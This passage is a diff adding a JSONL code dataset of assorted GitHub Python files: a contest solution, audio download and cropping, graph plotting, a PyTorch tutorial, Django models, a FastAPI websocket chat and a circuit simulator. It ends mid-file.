diff --git "a/389.jsonl" "b/389.jsonl" new file mode 100644--- /dev/null +++ "b/389.jsonl" @@ -0,0 +1,459 @@ +{"seq_id":"26930175794","text":"N = int(input())\nsrc = list(map(int, input()))\ndst = list(map(int, input()))\n\ntests = []\nfor _ in range(4):\n tests.append(src.copy())\n\ntests[1][0] ^= 1\ntests[1][1] ^= 1\ntests[2][0] ^= 1\ntests[2][1] ^= 1\ntests[2][-1] ^= 1\ntests[2][-2] ^= 1\ntests[3][-1] ^= 1\ntests[3][-2] ^= 1\n\nfor t, test in enumerate(tests):\n count = [0, 1, 2, 1][t]\n for i in range(N - 2):\n if test[i] != dst[i]:\n test[i] ^= 1\n test[i+1] ^= 1\n test[i+2] ^= 1\n count += 1\n if test[-3:] == dst[-3:]:\n print(count)\n break\nelse:\n print(-1)\n","repo_name":"jinhwanlazy/problem-solving","sub_path":"boj_2138/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"27368944481","text":"import json\n\nfrom pydantic import BaseModel\n\nfrom local_migrator import Encoder, object_hook\n\n\nclass SampleModel(BaseModel):\n field1: int\n field2: str\n\n\ndata = SampleModel(field1=4, field2=\"abc\")\n\nwith open(\"sample.json\", \"w\") as f_p:\n json.dump(data, f_p, cls=Encoder)\n\nwith open(\"sample.json\") as f_p:\n data2 = json.load(f_p, object_hook=object_hook)\n\nassert data == data2\n","repo_name":"Czaki/local-migrator","sub_path":"examples/base_example.py","file_name":"base_example.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"33462744124","text":"import re\nimport os\nimport json\nimport uuid\nimport pytube\nimport requests\nimport sys\nfrom bs4 import BeautifulSoup\nfrom moviepy.audio.io.AudioFileClip import AudioFileClip\nimport urllib.request\nfrom logging import Logger\n\n\nclass AgeRestrictedError(Exception):\n \"\"\"Exception in case YouTube video is age restricted.\"\"\"\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return f\"{self.__class__.__name__}: {self.message}\"\n\n\nclass AudioExporter():\n \"\"\"Class for extracting the audio from YouTube \n and Coub and cropping it to an mp3 of custom duration\"\"\"\n\n def __init__(self, logger: Logger, max_allowed_duration: int):\n self.logger = logger\n self.max_allowed_duration = max_allowed_duration\n self.folder_name_regex = re.compile(r'[^\\w\\-_. ]')\n self.youtube_url_regex = re.compile(\n r'^(?:https?://)?(?:www\\.)?(?:youtube\\.com/watch\\?v=|youtu.be/)([\\w-]{11})(?:\\S+)?$'\n )\n self.coub_url_regex = re.compile(\n r\"^(?:https?://)?(?:www\\.)?coub\\.com/view/([a-zA-Z0-9]+)$\")\n\n def _normalize_folder_name(self, folder_name: str):\n # Replace any invalid characters with underscores\n folder_name = self.folder_name_regex.sub('_', folder_name)\n\n # Remove leading/trailing whitespace\n folder_name = folder_name.strip()\n\n # Remove any consecutive underscores\n folder_name = re.sub('_{2,}', '_', folder_name)\n\n if sys.platform.startswith('win'):\n # Limit folder name to 255 characters (max allowed by NTFS file system)\n folder_name = folder_name[:255]\n\n return folder_name\n\n def _validate_youtube_url(self, url: str) -> bool:\n self.logger.info(f\"Checking if '{url}' is a valid YouTube URL\")\n match = self.youtube_url_regex.match(url)\n if match:\n return True\n else:\n return False\n\n def _validate_against_allowed_duration(self, duration: int):\n self.logger.info(\n f\"Validating that requested clip duration ({duration}) does not exceed allowed ({self.max_allowed_duration})\"\n )\n if duration > self.max_allowed_duration:\n raise Exception(\n f\"Clip duration exceeds allowed max duration: '{self.max_allowed_duration}'\"\n )\n\n def _validate_coub_url(self, url: str) -> bool:\n self.logger.info(f\"Checking if '{url}' is a valid Coub URL\")\n if self.coub_url_regex.match(url):\n return True\n else:\n return False\n\n def _get_coub_video_id(self, url: str) -> str:\n self.logger.info(f\"Get Coub video id from URL: '{url}'\")\n match = self.coub_url_regex.match(url)\n\n if match:\n video_id = match.group(1)\n self.logger.info(f\"Extracted video ID is {video_id}\")\n return video_id\n else:\n raise ValueError('Failed to get video id from Coub URL')\n\n def _download_coub_video(self, url) -> str:\n # Send a GET request to the URL\n response = urllib.request.urlopen(url)\n\n # Parse the HTML content using BeautifulSoup\n soup = BeautifulSoup(response, 'html.parser')\n html = soup.prettify()\n # Find the video element and extract the source URL\n video_element = soup.find(id='coubPageCoubJson')\n if video_element is None:\n raise ValueError('No video element found')\n coub_details = json.loads(video_element.text)\n audio_url = coub_details[\"file_versions\"]['html5']['audio']['high'][\n 'url'] # type: ignore\n self.logger.info(f\"Extracted audio url for coub: '{audio_url}'\")\n video_id = self._get_coub_video_id(url)\n # create a folder with the video title\n folder_name = self._normalize_folder_name(video_id)\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n file_name = f\"{video_id}.mp4\"\n download_path = os.path.join(folder_name, file_name)\n self.logger.info(f\"storing downloaded video as {file_name}\")\n\n if audio_url is None:\n raise ValueError('Audio URL was not extracted')\n\n response = requests.get(audio_url)\n with open(download_path, 'wb') as f:\n f.write(response.content)\n\n return download_path\n\n def _download_youtube_video(self, url: str) -> str:\n # Create a YouTube object using the video URL\n youtube = pytube.YouTube(url)\n\n if youtube.age_restricted:\n self.logger.error(f\"YouTube video ({url}) is age-restricted\")\n raise AgeRestrictedError(\n 'The video is age restricted and cannot be downloaded')\n\n title = youtube.title\n\n self.logger.info(f\"Working with video '{title}'\")\n\n # create a folder with the video title\n folder_name = self._normalize_folder_name(youtube.video_id)\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n\n audio_stream = youtube.streams.filter(only_audio=True).first()\n\n # check if video download was successful\n if audio_stream is None:\n raise ValueError('No audio stream found for video')\n\n # Get the audio stream of the YouTube video\n self.logger.info(\n f\"Downloading audio of YouTube video into {folder_name}\")\n return audio_stream.download(folder_name, f\"{youtube.video_id}.mp4\")\n\n def load_and_crop(self,\n url: str,\n full: bool,\n start: int = -1,\n end: int = -1) -> str:\n if not full:\n if start <= -1:\n prefix = '' if start == -1 else 'non-negative'\n raise ValueError(f\"{prefix} start value is required\")\n\n downloaded_file_path = ''\n\n if self._validate_youtube_url(url):\n downloaded_file_path = self._download_youtube_video(url)\n else:\n if self._validate_coub_url(url):\n downloaded_file_path = self._download_coub_video(url)\n\n if not downloaded_file_path:\n raise ValueError('Failed to download video')\n\n self.logger.info(\n f\"Working with downloaded file '{downloaded_file_path}'\")\n\n # use moviepy to extract the audio from the video and optionally clip it\n audio_clip = AudioFileClip(downloaded_file_path)\n\n if full:\n pass # use full audio\n else:\n audio_clip = self.validate_and_get_subclip(audio_clip, start, end)\n\n self._validate_against_allowed_duration(audio_clip.duration)\n\n output_path = os.path.join(f\"{uuid.uuid4()}.mp3\")\n\n self.logger.info(f\"Storing mp3 as {output_path}\")\n audio_clip.write_audiofile(output_path)\n\n # delete the original video file\n audio_clip.close()\n self.logger.info(f\"Removed {audio_clip.filename}\")\n\n os.remove(downloaded_file_path)\n return output_path\n \n def validate_and_get_subclip(self, audio_clip: AudioFileClip, start: int, end: int) -> AudioFileClip:\n if start >= audio_clip.duration:\n raise ValueError(\n 'start value is more or equal to duration of clip which doesn\\'t make sense'\n )\n if not end:\n self.logger.debug(\n f\"No --end value received. Setting it to the video duration: {audio_clip.duration}\"\n )\n end = audio_clip.duration\n else:\n if start >= end:\n raise ValueError('end value must be more than start value')\n if end > audio_clip.duration:\n self.logger.warn(\n f\"Clip duration is less than requested end time. Falling back to duration '{audio_clip.duration}'\"\n )\n end = audio_clip.duration\n self.logger.info(f\"Creating a subclip [{start};{end}]\")\n audio_clip = audio_clip.subclip(start, end)\n return audio_clip","repo_name":"Kerlione/sound-cropper-discord-bot","sub_path":"src/audio_exporter.py","file_name":"audio_exporter.py","file_ext":"py","file_size_in_byte":7979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31734316739","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 7 07:26:20 2019\n\n@author: tonpoppe\n\"\"\"\nimport time\nfrom datetime import datetime\nimport numpy as np\nimport tensorflow as tf\nimport networkx as nx\nfrom GAE.model import GraphAutoEncoderModel\nfrom GAE.data_feeder_nx import DataFeederNx\nfrom GAE.graph_reconstructor import GraphReconstructor\nfrom pyvis import network as net\nfrom PIL import Image\n\nclass Tools:\n \"\"\" class for tools on GraphCASE\n \"\"\"\n @staticmethod\n def plot_node(graph, node_id):\n \"\"\" sttic method to plot the 2 hub neighbourhood of a node in the graph.\n Args:\n graph: graph containing the node to plot.\n node_id: The id of the node to plot.\n \n \"\"\"\n und_graph = graph.to_undirected().copy()\n local_graph = [node_id] + list(und_graph.neighbors(node_id))\n for neightbor in und_graph.neighbors(node_id):\n local_graph = local_graph + [n for n in und_graph.neighbors(neightbor)]\n local_graph = list(set(local_graph)) # make list unique\n subgraph = graph.subgraph(local_graph)\n\n # plot subgraph\n nt = net.Network(notebook=True, directed=True)\n nt.from_nx(subgraph)\n # nt.set_edge_smooth('straightCross')\n length_dict = nx.single_source_dijkstra_path_length(und_graph, node_id, 2, weight=lambda u, v, d: 1)\n color_dict = {0: 'red', 1: 'lightblue', 2: 'lightgreen'}\n for node in nt.nodes:\n node[\"color\"] = color_dict[length_dict[node['id']]]\n node['shape'] = 'circle'\n for edge in nt.edges:\n edge['label'] = round(edge['weight'], 2)\n nt.toggle_physics(False)\n return nt\n\n @staticmethod\n def plot_layer(features, size):\n \"\"\"\n function to visualise a layer where each value is represented with a size x size format.\n \n Args:\n features: 2-d numpy array containing one row per node and for every node the node \n and corresponding edge properties.\n size: pixel size, the number of horizontal and vertical pixels used to\n visualize one value.\n\n A png of equal size of the feature numpy x size.\n \"\"\"\n\n #expend the pixels width and height to size-value\n pixels = np.repeat(features, size, axis=1)\n pixels = np.repeat(pixels, size, axis=0)\n\n # rescale between 0 and 255\n pixels = pixels * 255\n pixels = pixels.astype(np.uint8)\n\n im = Image.fromarray(pixels)\n\n return im ","repo_name":"tonyPo/GraphCase","sub_path":"GAE/graph_case_tools.py","file_name":"graph_case_tools.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"37318194524","text":"import socket\nfrom time import sleep\n\nsock = socket.socket()\nsock.setblocking(1)\nsock.connect(('localhost', 9090))\nwhile True:\n msg = input()\n sock.send(msg.encode())\n if msg == 'exit':\n break\n\n data = sock.recv(1024)\n print(data.decode())\nsock.close()\n","repo_name":"JuliaHaqq/1_echo_server_PI20-5","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7000544152","text":"from enhanced_display import Enhanced_Display\nimport time\n\nif __name__ == \"__main__\":\n\n display = Enhanced_Display()\n\n # Load the list of fonts to use\n display.load_fonts(['digits-30', 'text-16', 'icons-32', 'icons-128'])\n\n # Display the Welcome screen\n display.fill(0) # Clear the screen\n\n display.select_font('icons-128')\n display.text('s', 0, 0) # The 's' character is the Star icon\n display.select_font('text-16')\n display.text('Welcome', 0, 0, 1, 1) # Center the text both horizontally and vertically.\n\n display.save_screenshot(\"title.bmp\") # Take a screenshot and save to file.\n\n display.show()\n time.sleep(3)\n\n # Display the Text Alignment intro screen\n display.fill(0)\n\n display.text('Text', 0, 16, 1)\n display.text('Alignment', 0, 32, 1)\n\n display.show()\n time.sleep(1)\n\n # Display the left aligned text screen\n display.fill(0)\n\n display.text('left, top', 0, 0)\n display.text('left, center', 0, 0, 0, 1)\n display.text('left, bottom', 0, 0, 0, 2)\n\n display.show()\n time.sleep(1)\n\n # Display the center aligned text screen\n display.fill(0)\n\n display.text('center, top', 0, 0, 1, 0)\n display.text('center, center', 0, 0, 1, 1)\n display.text('center, bottom', 0, 0, 1, 2)\n\n display.show()\n time.sleep(1)\n\n # Display the right aligned text screen\n display.fill(0)\n\n display.text('right, top', 0, 0, 2, 0)\n display.text('right, center', 0, 0, 2, 1)\n display.text('right, bottom', 0, 0, 2, 2)\n\n display.show()\n time.sleep(1)\n\n # Display the Text & Icons intro screen\n display.fill(0)\n\n display.text('Text', 0, 8, 1)\n display.text('&', 0, 24, 1)\n display.text('Icons', 0, 40, 1)\n\n display.show()\n time.sleep(1.5)\n\n # Display the Temperature screen\n display.fill(0)\n\n display.select_font('digits-30')\n degrees = '\\u00b0' # Character code for the degrees symbol\n display.text(f'12.3{degrees}', 0, 0, 1, 1)\n display.select_font('icons-32')\n display.text('t', 0, 0, 2) # The 't' character contains the temperature icon\n display.select_font(None) # Select the built in 8 pixel font\n display.text('Temperature', 0, 0, 1, 2)\n\n display.show()\n time.sleep(2)\n\n # Display the Humidity screen\n display.fill(0)\n\n display.select_font('digits-30')\n display.text('76', 0, 0, 1, 1)\n display.select_font('icons-32')\n display.text('h', 0, 0, 2) # The 'h' character contains the humidity icon\n display.select_font(None)\n display.text('Humidity', 0, 0, 1, 2)\n\n display.show()\n time.sleep(2) \n\n # Display the Pressure screen\n display.fill(0)\n\n display.select_font('digits-30')\n display.text('985', 0, 0, 1, 1, display.width - 32)\n display.select_font('icons-32')\n display.text('p', 0, 0, 2) # The 'p' character contains the pressure icon\n display.select_font(None)\n display.text('Pressure', 0, 0, 1, 2)\n\n display.show()\n time.sleep(2)\n\n # Display the Thank you screen\n display.fill(0)\n\n display.select_font('icons-128')\n display.text('s', 0, 0)\n display.select_font('text-16')\n display.text('Thank you', 0, 0, 1, 1)\n display.show()\n","repo_name":"mark-gladding/packed-font","sub_path":"display/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"23847761376","text":"import torch\r\n\r\nx = torch.ones(5) # input tensor\r\ny = torch.zeros(3) # expected output\r\nw = torch.randn(5, 3, requires_grad=True)\r\nb = torch.randn(3, requires_grad=True)\r\nz = torch.matmul(x, w)+b\r\nloss = torch.nn.functional.binary_cross_entropy_with_logits(z, y)\r\n\r\nprint('Gradient function for z =',z.grad_fn)\r\nprint('Gradient function for loss =', loss.grad_fn)\r\n\r\n# Computes the gradient\r\nloss.backward()\r\nprint(w.grad)\r\nprint(b.grad)\r\n\r\n# Disables gradient tracking\r\nz = torch.matmul(x, w)+b\r\nprint(z.requires_grad)\r\n\r\nwith torch.no_grad():\r\n z = torch.matmul(x, w)+b\r\nprint(z.requires_grad)\r\n\r\n# Makes a jacobian product instead of a gradient\r\ninp = torch.eye(5, requires_grad=True)\r\nout = (inp+1).pow(2)\r\nout.backward(torch.ones_like(inp), retain_graph=True)\r\nprint(\"First call\\n\", inp.grad)\r\nout.backward(torch.ones_like(inp), retain_graph=True)\r\nprint(\"\\nSecond call\\n\", inp.grad)\r\ninp.grad.zero_()\r\nout.backward(torch.ones_like(inp), retain_graph=True)\r\nprint(\"\\nCall after zeroing gradients\\n\", inp.grad)\r\n\r\n# Initialize the loss function\r\nloss_fn = nn.CrossEntropyLoss()\r\n\r\n# Initialize opitmzation\r\noptimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\r\n\r\n# Train_loop loops over the opiztation code, test_loop evaules models performace agasint the test_data\r\ndef train_loop(dataloader, model, loss_fn, optimizer):\r\n size = len(dataloader.dataset)\r\n for batch, (X, y) in enumerate(dataloader):\r\n # Compute prediction and loss\r\n pred = model(X)\r\n loss = loss_fn(pred, y)\r\n\r\n # Backpropagation\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if batch % 100 == 0:\r\n loss, current = loss.item(), batch * len(X)\r\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\r\n\r\n\r\ndef test_loop(dataloader, model, loss_fn):\r\n size = len(dataloader.dataset)\r\n test_loss, correct = 0, 0\r\n\r\n with torch.no_grad():\r\n for X, y in dataloader:\r\n pred = model(X)\r\n test_loss += loss_fn(pred, y).item()\r\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\r\n\r\n test_loss /= size\r\n correct /= size\r\n print(f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\r\n\r\n# Initzliaes the loss function and opizator and passes it to the test_loop, train_loop\r\nloss_fn = nn.CrossEntropyLoss()\r\noptimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\r\n\r\nepochs = 10\r\nfor t in range(epochs):\r\n print(f\"Epoch {t+1}\\n-------------------------------\")\r\n train_loop(train_dataloader, model, loss_fn, optimizer)\r\n test_loop(test_dataloader, model, loss_fn)\r\nprint(\"Done!\")\r\n\r\n# Let off here:https://pytorch.org/tutorials/beginner/basics/saveloadrun_tutorial.html\r\n","repo_name":"Appleriot/Machine_Learning","sub_path":"autograd.py","file_name":"autograd.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28270021761","text":"import logging\nimport os\nimport time\nfrom openai.error import OpenAIError\nimport requests\nfrom telegram import Update\nfrom telegram.ext import ContextTypes\nfrom src.qa.chain import create_chain\n\n# TODO: hide langchain from telegrambot.py\nimport datetime\nfrom langchain.callbacks import get_openai_callback\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO\n)\n\nDEFAULT_PROMPT_TEMPLATE = \"\"\"Assistant is a large language model trained by OpenAI.\n Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.\n Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.\n Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.\n {history}\n Human: {human_input}\n Assistant:\"\"\"\nDEFAULT_START_MESSAGE = \"Hello, I'm an AI-powered chatbot 😊\\nSend me a message and I'll try to answer it.\"\n\n\nclass BotApp:\n def __init__(self):\n # You can adjust the template as needed. Reload the bot to apply changes.\n self.chains = {}\n self.prompt_template = os.environ.get(\n \"PROMPT_TEMPLATE\", DEFAULT_PROMPT_TEMPLATE)\n self.is_verbose = os.environ.get(\"VERBOSE\") == \"1\"\n self.source_text = None\n self.source_text_version = None\n\n async def get_source_text(self, source_text_url):\n print(\"[INFO] fetching source text from\", source_text_url)\n version = int(time.time())\n response = requests.get(\"{}?_v={}\".format(source_text_url, version))\n self.source_text_version = version\n return response.text\n\n async def handle_start(self, update: Update, ctx: ContextTypes.DEFAULT_TYPE):\n await ctx.bot.send_message(chat_id=update.effective_chat.id,\n text=os.environ.get(\"START_MESSAGE\", DEFAULT_START_MESSAGE))\n\n async def handle_text(self, update: Update, ctx: ContextTypes.DEFAULT_TYPE):\n text = update.message.text\n\n chat_id = update.message.chat.id\n sender_name = update.message.from_user.username or update.message.from_user.first_name\n is_group = update.message.chat.type == \"group\"\n is_reply = update.message.reply_to_message\n\n # Refresh source_text every 60 seconds\n if self.source_text_version is None or int(time.time()) - self.source_text_version >= 60:\n self.source_text = await self.get_source_text(os.environ.get(\"QA_TEXT_URL\"))\n\n # Prepare session for the user\n chain = self.chains.get(chat_id)\n if not chain:\n # chain is unique per chat\n # chain = create_chain(self.prompt_template, self.is_verbose) # if using src.llm\n\n chain = create_chain(\n self.source_text, self.is_verbose) # if using src.qa\n\n self.chains[chat_id] = chain\n logging.info(\" new chain created: %d\", chat_id)\n\n if text.lower() == \"ping\":\n await ctx.bot.send_message(chat_id=update.effective_chat.id,\n text=\"pong!\")\n else:\n start_time = datetime.datetime.now()\n\n if is_group:\n # Skip if message is from group but doesn't have mention\n if not text.startswith(f\"@{ctx.bot.username}\"):\n return\n # Remove mention from the text\n text = text[len(f\"@{ctx.bot.username}\") + 1:]\n\n # Use reply text as prompt\n if is_reply:\n text = f\"{text}: {update.message.reply_to_message.text}\"\n\n logging.info(\"[message] new %smessage from %s\",\n \"group \" if is_group else \"\", sender_name)\n\n with get_openai_callback() as cb:\n await ctx.bot.send_chat_action(chat_id=update.effective_chat.id,\n action=\"typing\")\n logging.info(\" predicting...\")\n\n try:\n output = chain.predict(human_input=text)\n bot_reply = output\n except OpenAIError as e:\n logging.error(\"OpenAIError: %s\", e)\n bot_reply = \"Sorry, I seem to have some issues 😕\\nPlease try again later.\"\n\n await ctx.bot.send_message(chat_id=update.effective_chat.id,\n text=bot_reply)\n\n logging.info(\" human_input: %s\", text)\n logging.info(\" output: %s\", bot_reply)\n logging.info(\" total_tokens: %d\", cb.total_tokens)\n logging.info(\" time_elapsed_ms: %d ms\",\n (datetime.datetime.now() - start_time).microseconds / 1000)\n","repo_name":"wzulfikar/langchain-playground","sub_path":"src/bot_app.py","file_name":"bot_app.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21631830838","text":"# OBJECT 1: Write a python program to check of the \n# given string is palindrome or not using stack.\n\nclass stack():\n def __init__(self):\n self.mylist = []\n def pop(self):\n return self.mylist.pop()\n def push(self,val):\n self.mylist.append(val)\n\na = input(\"Input a string: \") \nmystack=stack()\nfor i in a:\n mystack.push(i)\nb=\"\"\nfor i in a:\n b+=mystack.pop()\nif (a==b):\n print(\"Its a palindrome string\")\nelse:\n print(\"its not a palindrome string\")\n\n\n\n\n\n\n\n","repo_name":"qasim29/DSA_LABS","sub_path":"LAB_6_OBJ_1.py","file_name":"LAB_6_OBJ_1.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"19708838682","text":"from django.db import models\nfrom main.models import Product\n\n\nclass Orders(models.Model):\n STATE_CHOICES = (\n ('NotProcessed', 'Not Processed'),\n ('InProgress', 'InProgress'),\n ('Processed', 'Processed'),\n )\n user_name = models.CharField('Name', max_length=100)\n user_surname = models.CharField('Surname', max_length=100)\n email = models.EmailField('Email')\n number_phone = models.CharField(max_length=20)\n city = models.CharField(max_length=100)\n house_number = models.CharField(max_length=50)\n street = models.CharField(max_length=100)\n product = models.ManyToManyField(Product, through='OrderItem')\n state = models.CharField('State', max_length=20, choices=STATE_CHOICES, default='NotProcessed')\n\n\nclass OrderItem(models.Model):\n order = models.ForeignKey(Orders, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.PositiveIntegerField('Quantity product')\n","repo_name":"OleksandrSelehei/Django_Project_1","sub_path":"webShopPrototypeDjango/ShopPrototype/cart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28205994379","text":"n=int(input())\r\np=q=r=[]\r\np=input().split()\r\nq=input().split()\r\nr=input().split()\r\nc=0\r\nf=[]\r\ng=[]\r\nh=[]\r\nfor x in q:\r\n if f.count(x)==0:\r\n f.append(x)\r\nfor x in r:\r\n if g.count(x)==0:\r\n g.append(x)\r\nfor x in p:\r\n for y in f:\r\n if int(x)\n\n \n Chat\n \n \n

WebSocket Chat

\n

Your ID:

\n
\n \n \n
\n \n \n \n\n\"\"\"\n\n\nclass ConnectionManager:\n def __init__(self):\n self.active_connections: List[WebSocket] = []\n\n async def connect(self, websocket: WebSocket):\n await websocket.accept()\n self.active_connections.append(websocket)\n\n def disconnect(self, websocket: WebSocket):\n self.active_connections.remove(websocket)\n\n async def send_personal_message(self, message: str, websocket: WebSocket):\n await websocket.send_text(message)\n\n async def broadcast(self, message: str):\n for connection in self.active_connections:\n await connection.send_text(message)\n\n\nmanager = ConnectionManager()\n\n@router.post(\"/create_room\")\nasync def create_room(request: RoomCreateRequest, token: str = Depends(oauth2_scheme)):\n print( f'request sosat {request.uid}' )\n res = await insert_room(request.uid, request.room_name, rooms_collection)\n logging.info(f\"CREATE_ROOM: request.username: {request.username}, room_name: {request.room_name}\")\n return {'201': 'room created'}\n\n@router.get(\"/rooms\")\nasync def rooms(token: str = Depends(oauth2_scheme)):\n rooms = await get_rooms()\n return rooms\n\n@router.get(\"/room/{room_name}\")\nasync def search_room(room_name, token: str = Depends(oauth2_scheme)):\n room = await get_room(room_name)\n return room\n\n@router.post(\"/create_message\")\nasync def create_message(request: MessageCreateRequest, token: str = Depends(oauth2_scheme)):\n res = await insert_message(request.username, request.content, message_collection)\n logging.info(f\"SEND_MESSAGE: request.username: {request.username}, request.content: {request.content}\")\n return {'201': 'room created'}\n\n@router.get(\"/messages\")\nasync def messages(token: str = Depends(oauth2_scheme)):\n \"\"\"\n List message \n \"\"\"\n messages = await get_messages()\n return messages\n\n@router.get(\"/\") \nasync def get():\n return HTMLResponse(html)\n\n\n@router.websocket(\"/ws/{client_id}\")\nasync def websocket_endpoint(websocket: WebSocket, client_id: int):\n\n \"\"\"\n\n Подключение к серверу\n Ендпоинт вебсокета который демонстрирует общение.\n\n Поменять данный вебсокет именно под комнату для отправки сообщений\n \n\n \"\"\"\n\n\n await manager.connect(websocket)\n try:\n while True:\n data = await websocket.receive_text()\n await manager.send_personal_message(f\"You wrote: {data}\", websocket)\n await manager.broadcast(f\"Client #{client_id} says: {data}\")\n # await send_message(roomId, userId, message)\n await send_message(\"601ff693fb7694b194f391f5\", \"601faca84b9a40393eb936db\", data)\n \n print(f\"You wrote: {data}\", websocket)\n print(f\"Client #{client_id} says: {data}\")\n\n except WebSocketDisconnect:\n manager.disconnect(websocket)\n await manager.broadcast(f\"Client #{client_id} left the chat\")\n print(f\"Client #{client_id} left the chat\")\n","repo_name":"LofyVintaj/Vi","sub_path":"src/chat/v1/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"5347590354","text":"from circuitSimulatorBase import CircuitSimulatorBase\nfrom nmosFet import NmosFet\nfrom wire import Wire\n\nclass CircuitSimulator(CircuitSimulatorBase):\n def __init__(self):\n CircuitSimulatorBase.__init__(self)\n\n def doWireRecalc(self, wireIndex):\n if wireIndex == self.gndWireIndex or wireIndex == self.vccWireIndex:\n return\n\n group = set()\n self.addWireToGroup(wireIndex, group)\n \n newValue = self.getWireValue(group)\n newHigh = newValue == Wire.HIGH or newValue == Wire.PULLED_HIGH or \\\n newValue == Wire.FLOATING_HIGH\n\n for groupWireIndex in group:\n if groupWireIndex == self.gndWireIndex or \\\n groupWireIndex == self.vccWireIndex:\n # TODO: remove gnd and vcc from group?\n continue\n simWire = self.wireList[groupWireIndex]\n simWire.state = newValue\n for transIndex in simWire.gateInds:\n\n t = self.transistorList[transIndex]\n\n if newHigh == True and t.gateState == NmosFet.GATE_LOW:\n self.turnTransistorOn(t)\n if newHigh == False and t.gateState == NmosFet.GATE_HIGH:\n self.turnTransistorOff(t)\n\n def turnTransistorOn(self, t):\n t.gateState = NmosFet.GATE_HIGH\n\n wireInd = t.side1WireIndex\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n wireInd = t.side2WireIndex\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n def turnTransistorOff(self, t):\n t.gateState = NmosFet.GATE_LOW\n\n c1Wire = t.side1WireIndex\n c2Wire = t.side2WireIndex\n self.floatWire(c1Wire)\n self.floatWire(c2Wire)\n\n wireInd = c1Wire\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n wireInd = c2Wire\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n\n def getWireValue(self, group):\n # TODO PERF: why turn into a list?\n l = list(group)\n sawFl = False\n sawFh = False\n value = self.wireList[l[0]].state\n\n for wireIndex in group:\n if wireIndex == self.gndWireIndex:\n return Wire.GROUNDED\n if wireIndex == self.vccWireIndex:\n if self.gndWireIndex in group:\n return Wire.GROUNDED\n else:\n return Wire.HIGH\n wire = self.wireList[wireIndex]\n if wire.pulled == Wire.PULLED_HIGH:\n value = Wire.PULLED_HIGH\n elif wire.pulled == Wire.PULLED_LOW:\n value = Wire.PULLED_LOW\n \n if wire.state == Wire.FLOATING_LOW:\n sawFl = True\n elif wire.state == Wire.FLOATING_HIGH:\n sawFh = True\n\n if value == Wire.FLOATING_LOW or value == Wire.FLOATING_HIGH:\n # If two floating regions are connected together,\n # set their voltage based on whichever region has\n # the most components. The resulting voltage should\n # be determined by the capacitance of each region.\n # Instead, we use the count of the number of components\n # in each region as an estimate of how much charge \n # each one holds, and set the result hi or low based\n # on which region has the most components.\n if sawFl and sawFh:\n sizes = self.countWireSizes(group)\n if sizes[1] < sizes[0]:\n value = Wire.FLOATING_LOW\n else:\n value = Wire.FLOATING_HIGH\n return value\n\n def addWireToGroup(self, wireIndex, group):\n self.numAddWireToGroup += 1\n group.add(wireIndex)\n wire = 